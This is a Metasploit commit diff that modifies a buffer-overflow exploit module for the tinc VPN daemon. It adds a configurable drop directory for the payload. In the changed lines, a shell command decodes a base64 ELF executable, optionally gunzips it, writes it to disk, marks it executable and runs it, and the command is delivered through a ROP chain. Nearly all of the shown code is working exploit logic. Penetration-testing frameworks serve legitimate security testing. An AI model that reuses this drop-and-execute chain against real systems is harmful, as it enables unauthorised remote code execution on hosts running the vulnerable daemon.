Drop location for binary can be customized

rapid7 · Feb 12, 2014 · e5a237a · e5a237a
1 parent bb270ce
commit e5a237a
Show file tree

Hide file tree

Showing 2 changed files with 16 additions and 4 deletions.
diff --git a/lib/msf/core/exploit/tincd.rb b/lib/msf/core/exploit/tincd.rb
@@ -253,7 +253,7 @@ def pop_inbuffer(size)
 
   def read_line
     idx = @inbuffer.index("\n")
-    data = pop_inbuffer(idx)
+    pop_inbuffer(idx)
   end
 
   def line?

diff --git a/modules/exploits/multi/vpn/tincd_bof.rb b/modules/exploits/multi/vpn/tincd_bof.rb
@@ -78,6 +78,14 @@ def initialize(info = {})
           ],
       'DisclosureDate' => 'Apr 22 2013', # finding, msf module: Dec 2013
       'DefaultTarget'  => 0))
+      register_options(
+        [ # Only for shellcodes that write binary to disk
+          # Has to be short, usually either . or /tmp works
+          # /tmp can be mounted as noexec
+          # . is only working if tincd is running as root
+          OptPath.new('BINARY_DROP_LOCATION', [false, 'Location to drop the executable, usually /tmp or .', '/tmp' ]),
+        ], self
+      )
   end
 
   def exploit
@@ -256,14 +264,18 @@ def exploit
         exe = generate_payload_exe
         elf_base64 = Rex::Text::encode_base64(exe)
         filename = rand_text_alpha(1)
+        cd = "cd #{datastore['BINARY_DROP_LOCATION']};"
+        if datastore['BINARY_DROP_LOCATION'] == '.'
+          cd = ''
+        end
         # try plain first
-        args = ['/bin/sh', '-c', "cd /tmp;echo #{elf_base64}|base64 -d>#{filename};chmod +x #{filename};./#{filename}"]
+        args = ['/bin/sh', '-c', "#{cd}echo #{elf_base64}|base64 -d>#{filename};chmod +x #{filename};./#{filename}"]
         shellcode = create_fedora_rop(args)
         if shellcode.length > target['offset']
           # try zipped version
-          print_status("Plain version too big (#{shellcode.length}), trying zipped version")
+          print_status("Plain version too big (#{shellcode.length}, max. #{target['offset']}), trying zipped version")
           elf_zipped_base64 = Rex::Text::encode_base64(Rex::Text.gzip(exe))
-          args = ['/bin/sh', '-c', "cd /tmp;echo #{elf_zipped_base64}|base64 -d|gunzip>#{filename};chmod +x #{filename};./#{filename}"]
+          args = ['/bin/sh', '-c', "#{cd}echo #{elf_zipped_base64}|base64 -d|gunzip>#{filename};chmod +x #{filename};./#{filename}"]
           shellcode = create_fedora_rop(args)
           print_status("Achieved version with #{shellcode.length} bytes")
         end